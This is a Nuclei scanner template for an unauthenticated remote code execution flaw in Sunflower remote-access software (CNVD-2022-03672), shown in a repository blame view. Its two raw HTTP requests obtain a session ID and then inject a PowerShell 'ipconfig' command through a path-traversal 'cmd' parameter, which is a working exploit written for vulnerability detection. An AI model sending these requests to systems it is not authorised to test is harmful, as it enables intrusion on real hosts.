nuclei-templates/http/cnvd/2022/CNVD-2022-03672.yaml

48 lines
1.5 KiB
YAML
Raw Normal View History

2022-02-22 23:30:18 +00:00
id: CNVD-2022-03672
info:
name: Sunflower Simple and Personal - Remote Code Execution
2022-02-22 23:30:18 +00:00
author: daffainfo
severity: critical
description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability.
2022-02-22 23:30:18 +00:00
reference:
- https://www.1024sou.com/article/741374.html
- https://copyfuture.com/blogs-details/202202192249158884
2022-02-28 20:34:49 +00:00
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 2
2024-01-14 09:21:50 +00:00
tags: cnvd,cnvd2022,sunflower,rce
2022-02-22 23:30:18 +00:00
http:
2022-02-22 23:30:18 +00:00
- raw:
- |
POST /cgi-bin/rpc HTTP/1.1
Host: {{Hostname}}
action=verify-haras
- |
2022-02-24 19:01:56 +00:00
GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
2022-02-22 23:30:18 +00:00
Host: {{Hostname}}
Cookie: CID={{cid}}
2022-02-23 08:40:26 +00:00
extractors:
2022-02-22 23:30:18 +00:00
- type: regex
name: cid
2022-02-28 20:34:49 +00:00
internal: true
2022-02-22 23:30:18 +00:00
group: 1
2022-02-23 08:40:26 +00:00
regex:
2023-02-07 08:04:33 +00:00
- '"verify_string":"(.*?)"'
2022-02-22 23:30:18 +00:00
matchers:
- type: dsl
dsl:
- "status_code_1==200"
- "status_code_2==200"
2022-02-23 08:40:26 +00:00
- "contains(body_1, 'verify_string')"
2022-02-22 23:30:18 +00:00
- "contains(body_2, 'Windows IP')"
2022-02-28 20:34:49 +00:00
condition: and
# digest: 4a0a004730450220390bd0f291ed6719ac99f1b99704321d1d494d765e27a461bfa4e40e2c5b1de3022100e455e5442cc085d18b9510c673ce41df4cfabc49acf8e45f5bb687cca53a4f9e:922c64590222798bb761d5b6d8e72950